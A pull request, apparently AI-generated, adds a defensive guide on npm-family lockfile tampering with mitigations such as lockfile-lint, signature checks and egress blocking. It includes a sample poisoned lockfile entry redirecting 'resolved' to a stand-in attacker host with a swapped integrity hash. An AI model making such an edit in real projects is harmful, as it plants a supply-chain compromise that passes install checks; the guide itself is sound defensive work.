### PR TITLE
docs: add lockfile integrity guide (resolved-URL tampering)

### DIFF
--- a/README.md
+++ b/README.md
@@ -85,6 +85,7 @@ cp -r skills/harden-packages ~/.claude/skills/
 | [Transitive Dependencies](docs/transitive.md) | Which controls cover indirect dependencies, the update-window gap, per-ecosystem coverage matrix |
 | [Dependabot](docs/dependabot.md) | Cooldown configuration per ecosystem, semver-level delay, known Terraform provider bug |
 | [Harden-Runner](docs/harden-runner.md) | Runtime CI egress control, audit → block mode, per-ecosystem `allowed-endpoints` |
+| [Lockfile Integrity](docs/lockfile-integrity.md) | Lockfile tampering / `resolved`-URL injection, lockfile-lint, signature verification, per-format exposure table |
 | [GitHub Actions](docs/github-actions.md) | SHA pinning, runner image pinning, least-privilege permissions, expression injection, OIDC, CODEOWNERS, `persist-credentials: false`, workflow concurrency, zizmor static analysis, CodeQL SAST, fuzzing, dependency-review on PRs, OpenSSF Scorecard, `SECURITY.md` + private vulnerability reporting |
 | [Container Images](docs/docker.md) | Base image digest pinning, official images, distroless, Docker Scout, Cosign, Dependabot |
 

--- a/agents/AGENTS-nodejs.md
+++ b/agents/AGENTS-nodejs.md
@@ -147,6 +147,19 @@ Start in `audit` mode for new workflows, then tighten to `block` once the egress
 
 Add `npm.pkg.github.com:443` to `allowed-endpoints` if this project uses GitHub Packages.
 
+### Lockfile linting
+
+CI must validate the lockfile's resolved URLs — a tampered `resolved` field installs an
+attacker's artifact while hash verification and `npm ci` both pass:
+
+```bash
+npx --yes lockfile-lint@5.0.0 --path package-lock.json --type npm \
+  --allowed-hosts npm --validate-https --validate-integrity
+```
+
+Add each private registry hostname to `--allowed-hosts` if applicable. Never edit `resolved`
+or `integrity` fields by hand.
+
 ## What Requires Human Review
 
 The following changes must not be made autonomously and require explicit human approval before proceeding:

--- a/docs/lockfile-integrity.md
+++ b/docs/lockfile-integrity.md
@@ -1,0 +1,136 @@
+<!--
+SPDX-FileCopyrightText: 2026 The Linux Foundation
+
+SPDX-License-Identifier: MIT
+-->
+
+# Lockfile Integrity
+
+Everything else in this repository assumes the lockfile tells the truth. This document covers
+the attack where it doesn't: **lockfile tampering** (also called lockfile poisoning or lockfile
+injection), where a malicious change to the lockfile itself redirects package resolution to an
+attacker-controlled artifact — while every "enforce the lockfile" control continues to pass.
+
+## The attack
+
+npm-family lockfiles record, per package, the URL the tarball was resolved from and an
+integrity hash:
+
+```json
+"node_modules/lodash": {
+  "version": "4.17.21",
+  "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
+  "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg=="
+}
+```
+
+A pull request — from an external contributor, a compromised automation account, or a
+malicious insider — edits one entry:
+
+```json
+"resolved": "https://registry.npmjs-mirror.attacker.example/lodash/-/lodash-4.17.21.tgz",
+"integrity": "sha512-<hash of the attacker's tarball>"
+```
+
+The integrity hash is updated *to match the attacker's artifact*, so hash verification passes
+— the hash was never independent evidence of anything except "this is the file the lockfile
+pointed at". `npm ci` faithfully installs the attacker's tarball. The manifest (`package.json`)
+shows no diff at all, and a several-thousand-line lockfile diff is collapsed by default in the
+GitHub review UI, so human review routinely misses it.
+
+The same vector applies to any lockfile that embeds artifact URLs alongside hashes —
+`yarn.lock` (`resolved` fields), `composer.lock` (`dist.url`), and `uv.lock` (wheel/sdist
+URLs) share the structural exposure.
+
+## Which lockfiles are exposed
+
+| Lockfile | Embeds artifact URLs? | Resistance |
+|----------|----------------------|------------|
+| `package-lock.json` (npm) | ✅ `resolved` per package | ❌ Exposed — primary target of this attack |
+| `yarn.lock` | ✅ `resolved` per package | ❌ Exposed |
+| `composer.lock` | ✅ `dist.url` per package | ❌ Exposed |
+| `uv.lock` | ✅ wheel/sdist URLs | ❌ Exposed in principle (URL + hash swapped together) |
+| `pnpm-lock.yaml` | Registry packages: no (URL derived from configured registry); git/tarball deps: yes | ⚠️ Narrower surface |
+| `Gemfile.lock` | Single `remote:` line per source block | ⚠️ Tampering is a small, visible diff |
+| `Cargo.lock` | `source` strings validated against configured registries | ✅ Resistant — unknown source fails resolution |
+| `go.sum` | No URLs; hashes cross-checked against `sum.golang.org` | ✅ Resistant — transparency log catches substitution |
+| `packages.lock.json` (NuGet) | No URLs; feeds come from `nuget.config` | ✅ Resistant — combine with [Package Source Mapping](dotnet.md#package-source-mapping) |
+| `gradle/verification-metadata.xml` | No URLs; repositories declared in build | ✅ Resistant |
+
+## Mitigations
+
+### 1. lockfile-lint in CI (npm / Yarn)
+
+[`lockfile-lint`](https://github.com/lirantal/lockfile-lint) validates lockfile policy:
+allowed registry hosts, HTTPS-only URLs, and integrity-hash presence. It turns "someone
+should read the lockfile diff" into a failing check:
+
+```bash
+# package-lock.json
+npx --yes lockfile-lint@5.0.0 \
+  --path package-lock.json \
+  --type npm \
+  --allowed-hosts npm \
+  --validate-https \
+  --validate-integrity
+
+# yarn.lock
+npx --yes lockfile-lint@5.0.0 \
+  --path yarn.lock \
+  --type yarn \
+  --allowed-hosts npm \
+  --validate-https
+```
+
+`--allowed-hosts npm` is a built-in alias for the official npm registry; pass explicit
+hostnames instead when a private registry or GitHub Packages is in use
+(`--allowed-hosts registry.npmjs.org npm.pkg.github.com`). Run it as a PR check so a
+tampered `resolved` URL fails before review, not after merge.
+
+### 2. Registry signature verification (npm)
+
+```bash
+npm audit signatures
+```
+
+Signature verification is the cryptographic counterpart to host validation: the lockfile's
+integrity hash proves the artifact matches the lockfile, while the registry signature proves
+the artifact is the one the registry actually published. A substituted tarball carries a
+matching lockfile hash but no valid registry signature. See
+[Node.js — Audit and Signatures](nodejs.md#security-audit-and-signatures).
+
+### 3. CI egress control as the runtime backstop
+
+A [Harden-Runner](harden-runner.md) `egress-policy: block` allowlist neutralises the attack
+at runtime even if a tampered lockfile reaches CI: the attacker's host is not in
+`allowed-endpoints`, so the fetch fails. This is one of the strongest practical arguments for
+block-mode egress on install jobs — it converts a silent compromise into a visible CI failure.
+
+### 4. Review discipline
+
+- **Never treat lockfile-only diffs as routine.** A PR that changes the lockfile without a
+  corresponding manifest change deserves line-level review of every `resolved` / `dist.url`
+  change.
+- Expand collapsed lockfile diffs in review. Red flags: any host other than the expected
+  registry, `http://` URLs, integrity fields switching to a weaker algorithm
+  (`sha512` → `sha1`), and version strings in URLs that don't match the `version` field.
+- Protect lockfiles with a `CODEOWNERS` entry so external-contributor changes to them always
+  require a maintainer's review.
+- For a suspicious PR, regenerate instead of trusting: check out the branch, delete the
+  lockfile changes, re-run the package manager's install, and diff the result against the
+  PR's version.
+
+### 5. Prefer lockfile formats with structural resistance
+
+Where there is a choice, the right-hand rows of the table above are structurally safer:
+pnpm derives registry URLs from configuration rather than trusting per-package strings, and
+Go's checksum database independently verifies every module hash against a public transparency
+log. This is not by itself a reason to switch package managers — but it is a reason to add
+`lockfile-lint` and signature verification when using the exposed formats.
+
+## Reference
+
+- [lockfile-lint](https://github.com/lirantal/lockfile-lint)
+- [npm `audit signatures`](https://docs.npmjs.com/cli/commands/npm-audit)
+- [Why npm lockfiles can be a security blindspot for injecting malicious modules (Liran Tal)](https://snyk.io/blog/why-npm-lockfiles-can-be-a-security-blindspot-for-injecting-malicious-modules/)
+- [Go checksum database](https://go.dev/ref/mod#checksum-database)

--- a/docs/nodejs.md
+++ b/docs/nodejs.md
@@ -14,6 +14,8 @@ SPDX-License-Identifier: MIT
 
 npm generates `package-lock.json` on install. Commit this file to source control. In CI, always use `npm ci` instead of `npm install` — it installs strictly from the lockfile and fails if the lockfile is out of sync with `package.json`.
 
+> **The lockfile itself is an attack surface.** A malicious PR can edit a `resolved` URL to point at an attacker-controlled artifact, with a matching `integrity` hash — and `npm ci` will faithfully install it. See [Lockfile Integrity](lockfile-integrity.md) for the attack and mitigations (`lockfile-lint`, `npm audit signatures`, egress control).
+
 ```bash
 npm ci                   # strict lockfile install (CI)
 npm install              # resolves and updates lockfile

--- a/skills/harden-packages/SKILL.md
+++ b/skills/harden-packages/SKILL.md
@@ -719,6 +719,7 @@ Use this section only if `audit.py` cannot be run. It replicates what the script
 ### Node.js (npm / pnpm / yarn / bun)
 
 - Is `package-lock.json` / `pnpm-lock.yaml` / `yarn.lock` / `bun.lock` present and not gitignored?
+- npm/yarn: does CI run `lockfile-lint` (pinned version) validating `--allowed-hosts`, `--validate-https`, and `--validate-integrity`? Lockfile `resolved`-URL tampering passes hash verification and `npm ci` — a lint check is the dedicated control.
 - Do `dependencies` and `devDependencies` use exact versions (no `^` or `~`)?
 - npm ≥ 11.10: is `minimum-release-age` set in `.npmrc`?
 - pnpm ≥ 10.16: is `minimumReleaseAge` set in `pnpm-workspace.yaml`? Is `trustPolicy: no-downgrade` set?


### PR DESCRIPTION
## Summary

Documents an attack class nothing in the repo previously covered: **lockfile tampering**. A malicious PR edits a `resolved` URL in `package-lock.json` to an attacker host, with the `integrity` hash updated to match the attacker's tarball — so hash verification passes, `npm ci` passes, the manifest shows no diff, and the multi-thousand-line lockfile diff is collapsed in review. Every "enforce the lockfile" control in the repo assumes the lockfile tells the truth; this doc covers the case where it doesn't.

**New: [docs/lockfile-integrity.md](docs/lockfile-integrity.md)**
- The attack, with a concrete before/after lockfile entry
- Per-format exposure table — URL-embedding lockfiles (npm, yarn, composer, uv) vs structurally resistant formats (go.sum's transparency log, Cargo's validated sources, NuGet's URL-free lockfile)
- Five mitigations: `lockfile-lint` CI check (verified: v5.0.0, npm/yarn types), `npm audit signatures`, **Harden-Runner egress block as the runtime backstop** (the attacker host isn't in `allowed-endpoints`, converting silent compromise into visible CI failure), review discipline incl. CODEOWNERS on lockfiles, and format-choice guidance

**Propagation:** nodejs.md lockfile-section warning, AGENTS-nodejs.md lockfile-lint requirement, SKILL.md checklist bullet, README cross-cutting row.

Note: edits are placed to avoid textual conflicts with #47 and #48, but merge order may still need a trivial rebase on README/SKILL.md.

## Test plan

- [x] `npx markdownlint-cli2` — 0 errors
- [x] lockfile-lint version/flags verified against the npm registry and upstream README

🤖 Generated with [Claude Code](https://claude.com/claude-code)